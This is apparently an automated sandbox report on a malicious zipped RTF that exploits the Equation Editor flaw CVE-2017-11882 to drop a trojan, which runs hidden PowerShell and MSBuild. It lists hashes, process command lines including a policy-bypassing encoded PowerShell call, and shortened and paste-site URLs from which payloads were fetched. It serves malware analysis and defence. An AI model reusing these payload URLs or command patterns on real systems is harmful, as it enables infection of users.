File name: 6666472573665280.zip

Full analysis: https://app.any.run/tasks/b5b2b3af-6d52-4bea-9945-f2f55aa2f142
Verdict: Malicious activity
Threats:

Trojans are a group of malicious programs distinguished by their ability to masquerade as benign software. Depending on their type, trojans possess a variety of capabilities, ranging from maintaining full remote control over the victim’s machine to stealing data and files, as well as dropping other malware. At the same time, the main functionality of each trojan family can differ significantly depending on its type. The most common trojan infection chain starts with a phishing email.

Analysis date: July 12, 2020, 13:33:51
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags: exploit, CVE-2017-11882, trojan
Indicators:
MIME: application/zip
File info: Zip archive data, at least v2.0 to extract
MD5: 5F04B7F03D5AC303A61109B479566742
SHA1: 08C18558E7A54F8FD6A895266457EBC7DF088F56
SHA256: C7CB1A1FDAB3771930E95E58D3DCF30FF65EE43CEF3AAA339F0CEB1773AE57FE
SSDEEP: 3072:X8MRL88SNDrAo3nhMHr7ar7RBcTkMz2SylhTM:X8Ma8SNX/hACrNB22SyfTM

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided as is for the user's acknowledgement. ANY.RUN does not guarantee the maliciousness or safety of the content.
  • MALICIOUS
    • Application was dropped or rewritten from another process
      • 908.exe (PID: 3952)
    • Equation Editor starts application (CVE-2017-11882)
      • EQNEDT32.EXE (PID: 2164)
  • SUSPICIOUS
    • Creates files in the user directory
      • EQNEDT32.EXE (PID: 2164)
      • powershell.exe (PID: 2180)
    • Reads Internet Cache Settings
      • EQNEDT32.EXE (PID: 2164)
    • Executed via COM
      • EQNEDT32.EXE (PID: 2164)
    • Executable content was dropped or overwritten
      • EQNEDT32.EXE (PID: 2164)
    • Executes PowerShell scripts
      • 908.exe (PID: 3952)
  • INFO
    • Manual execution by user
      • WINWORD.EXE (PID: 2700)
    • Reads Microsoft Office registry keys
      • WINWORD.EXE (PID: 2700)
    • Creates files in the user directory
      • WINWORD.EXE (PID: 2700)
No Malware configuration.

TRiD

.zip | ZIP compressed archive (100)

EXIF

ZIP

ZipRequiredVersion: 20
ZipBitFlag: 0x0009
ZipCompression: Deflated
ZipModifyDate: 1980:00:00 00:00:00
ZipCRC: 0xaec81cc5
ZipCompressedSize: 115625
ZipUncompressedSize: 508916
ZipFileName: e7e4957edd94d6bfb8b321d1bcce32a7450bf507f0267974038d1e64b1223389
Total processes: 53
Monitored processes: 17
Malicious processes: 2
Suspicious processes: 0

Behavior graph (interactive graph not reproduced; processes shown, in graph order): start → drop and start → winrar.exe (no specs) → winword.exe (no specs) → eqnedt32.exe → 908.exe → powershell.exe → msbuild.exe (12 instances, all "no specs")

Process information

PID 452
CMD: "C:\Program Files\WinRAR\WinRAR.exe" "C:\Users\admin\AppData\Local\Temp\6666472573665280.zip"
Path: C:\Program Files\WinRAR\WinRAR.exe
Parent process: explorer.exe
User: admin
Company: Alexander Roshal
Integrity Level: MEDIUM
Description: WinRAR archiver
Version: 5.60.0

PID 2700
CMD: "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\Desktop\e7e4957edd94d6bfb8b321d1bcce32a7450bf507f0267974038d1e64b1223389.rtf"
Path: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
Parent process: explorer.exe
User: admin
Company: Microsoft Corporation
Integrity Level: MEDIUM
Description: Microsoft Word
Version: 14.0.6024.1000

PID 2164
CMD: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
Path: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
Parent process: svchost.exe
User: admin
Company: Design Science, Inc.
Integrity Level: MEDIUM
Description: Microsoft Equation Editor
Exit code: 0
Version: 00110900

PID 3952
CMD: C:\Users\Public\908.exe
Path: C:\Users\Public\908.exe
Parent process: EQNEDT32.EXE
User: admin
Integrity Level: MEDIUM
Exit code: 0
Version: 1.0.0.0

PID 2180
CMD: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy bypass -w 1 /e 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
Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Parent process: 908.exe
User: admin
Company: Microsoft Corporation
Integrity Level: MEDIUM
Description: Windows PowerShell
Exit code: 0
Version: 6.1.7600.16385 (win7_rtm.090713-1255)

PID 2992
CMD: "C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe"
Path: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe
Parent process: powershell.exe
User: admin
Company: Microsoft Corporation
Integrity Level: MEDIUM
Description: MSBuild.exe
Exit code: 4294967295
Version: 2.0.50727.5420 built by: Win7SP1

PID 3352
CMD: "C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe"
Path: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe
Parent process: powershell.exe
User: admin
Company: Microsoft Corporation
Integrity Level: MEDIUM
Description: MSBuild.exe
Exit code: 4294967295
Version: 2.0.50727.5420 built by: Win7SP1

PID 1600
CMD: "C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe"
Path: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe
Parent process: powershell.exe
User: admin
Company: Microsoft Corporation
Integrity Level: MEDIUM
Description: MSBuild.exe
Exit code: 4294967295
Version: 2.0.50727.5420 built by: Win7SP1

PID 3844
CMD: "C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe"
Path: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe
Parent process: powershell.exe
User: admin
Company: Microsoft Corporation
Integrity Level: MEDIUM
Description: MSBuild.exe
Exit code: 4294967295
Version: 2.0.50727.5420 built by: Win7SP1

PID 764
CMD: "C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe"
Path: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe
Parent process: powershell.exe
User: admin
Company: Microsoft Corporation
Integrity Level: MEDIUM
Description: MSBuild.exe
Exit code: 4294967295
Version: 2.0.50727.5420 built by: Win7SP1
Total events: 2 648
Read events: 1 463
Write events: 0
Delete events: 0

Modification events: No data

Executable files: 2
Suspicious files: 4
Text files: 4
Unknown types: 5

Dropped files

PID 452 | WinRAR.exe | C:\Users\admin\AppData\Local\Temp\Rar$DRb452.18461\e7e4957edd94d6bfb8b321d1bcce32a7450bf507f0267974038d1e64b1223389 | Type: (not listed)
MD5: (not listed)
SHA256: (not listed)

PID 2700 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\CVRDC1C.tmp | Type: cvr
MD5: (not listed)
SHA256: (not listed)

PID 2164 | EQNEDT32.EXE | C:\Users\admin\AppData\Local\Temp\CabEAD2.tmp | Type: (not listed)
MD5: (not listed)
SHA256: (not listed)

PID 2164 | EQNEDT32.EXE | C:\Users\admin\AppData\Local\Temp\TarEAD3.tmp | Type: (not listed)
MD5: (not listed)
SHA256: (not listed)

PID 2180 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\E9RCLLP4LU83XBJX3FJ5.temp | Type: (not listed)
MD5: (not listed)
SHA256: (not listed)

PID 2164 | EQNEDT32.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\78RFYB7Z\2CdbU6t[1].htm | Type: html
MD5: 7FACEB4149CAAF8167A76E2A0E8301EF
SHA256: A8222578E1918CD998ACA33A136DD48D2975AD3812661455431C6E7E4D18007E

PID 2700 | WINWORD.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Office\Recent\e7e4957edd94d6bfb8b321d1bcce32a7450bf507f0267974038d1e64b1223389.rtf.LNK | Type: lnk
MD5: CA5474593D1E86DABC25FB9F67C7B18F
SHA256: 90FEAB3365B2B623DAFA5A81CFE97133D893A16F3FA34EC17C0FF9BEB533911A

PID 2700 | WINWORD.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotm | Type: pgc
MD5: 64AD84B5B090E5825F9DB270461D2C88
SHA256: 2D069E2B42B7F15C16D48791E45038145BB5CBC750A3FBC567ED6FF71401584E

PID 2164 | EQNEDT32.EXE | C:\Users\Public\908.exe | Type: executable
MD5: 60659527CBFF3CF09DC3A611D0CEFD45
SHA256: EAC28940100A88348FDED33B007FC34D31958A890734C43D948B4C988297A53E

PID 2164 | EQNEDT32.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\B6QGX7LP\iK8oI[1].txt | Type: executable
MD5: 60659527CBFF3CF09DC3A611D0CEFD45
SHA256: EAC28940100A88348FDED33B007FC34D31958A890734C43D948B4C988297A53E
HTTP(S) requests: 4
TCP/UDP connections: 7
DNS requests: 5
Threats: 0

HTTP requests

PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation
2164 | EQNEDT32.EXE | GET | 200 | 2.16.186.35:80 | http://isrg.trustid.ocsp.identrust.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBRv9GhNQxLSSGKBnMArPUcsHYovpgQUxKexpHsscfrb4UuQdf%2FEFWCFiRACEAoBQUIAAAFThXNqC4Xspwg%3D | unknown | der | 1.37 Kb | whitelisted
2164 | EQNEDT32.EXE | GET | 301 | 67.199.248.10:80 | http://bit.ly/2CdbU6t | US | html | 116 b | shared
3952 | 908.exe | GET | 301 | 104.18.49.20:80 | http://paste.ee/r/6FUSS | US | html | 162 b | shared
2180 | powershell.exe | GET | 301 | 104.18.49.20:80 | http://paste.ee/r/7JPzD | US | html | 162 b | shared

Connections

PID | Process | IP | Domain | ASN | CN | Reputation
2164 | EQNEDT32.EXE | 67.199.248.10:80 | bit.ly | Bitly Inc | US | shared
2164 | EQNEDT32.EXE | 5.79.72.163:443 | u.teknik.io | LeaseWeb Netherlands B.V. | NL | malicious
2164 | EQNEDT32.EXE | 2.16.186.35:80 | isrg.trustid.ocsp.identrust.com | Akamai International B.V. | (not listed) | whitelisted
3952 | 908.exe | 104.18.49.20:80 | paste.ee | Cloudflare Inc | US | shared
2180 | powershell.exe | 104.18.49.20:80 | paste.ee | Cloudflare Inc | US | shared
3952 | 908.exe | 104.18.49.20:443 | paste.ee | Cloudflare Inc | US | shared
2180 | powershell.exe | 104.18.49.20:443 | paste.ee | Cloudflare Inc | US | shared

DNS requests

Domain | IP | Reputation
bit.ly | 67.199.248.10, 67.199.248.11 | shared
u.teknik.io | 5.79.72.163 | whitelisted
isrg.trustid.ocsp.identrust.com | 2.16.186.35, 2.16.186.11 | whitelisted
paste.ee | 104.18.49.20, 104.18.48.20, 172.67.219.133 | shared
pastecode.xyz | (no IP listed) | malicious

Threats

2 ETPRO signatures available in the full report (found threats are available for paid subscriptions)
No debug info